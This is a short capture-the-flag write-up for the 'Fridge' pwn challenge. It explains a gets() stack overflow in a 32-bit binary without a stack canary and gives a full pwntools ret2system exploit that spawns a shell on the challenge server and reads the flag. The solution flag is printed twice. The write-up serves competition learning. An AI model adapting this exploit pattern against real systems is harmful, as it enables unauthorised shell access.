Fridge - PWN
Points: 100 | Flag: 0xfun{4_ch1ll1ng_d1sc0v3ry!p1x3l_b3at_r3v3l4t1ons_c0d3x_b1n4ry_s0rcery_unl3@sh3d!} | Solved by: Smothy @ 0xN1umb
what we got
32-bit ELF with a "smart fridge debugging service". binary has gets() and system() - classic combo
bash
$ checksec vuln
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIEno canary, no PIE - we're eating good tonight
the solve
first thing i see in strings:
- Fixed issue that allowed bad actors to get /bin/sh
lmaooo the author literally put /bin/sh in the binary and told us about it. found it at 0x0804a09a
vulnerable function is set_welcome_message - uses gets() to read into a buffer at ebp-0x2c (44 bytes). offset to return address is 48 bytes.
exploit
python
from pwn import *
r = remote('chall.0xfun.org', 32823)
r.recvuntil(b'> ')
r.sendline(b'2') # set welcome message
r.recvuntil(b'chars):')
# ret2system baby
payload = b'A' * 48
payload += p32(0x080490a0) # system@plt
payload += p32(0xdeadbeef) # fake ret (dont care)
payload += p32(0x0804a09a) # "/bin/sh"
r.sendline(payload)
r.sendline(b'cat /flag*')
print(r.recv())ez 100 points
flag
0xfun{4_ch1ll1ng_d1sc0v3ry!p1x3l_b3at_r3v3l4t1ons_c0d3x_b1n4ry_s0rcery_unl3@sh3d!}
smothy out ✌️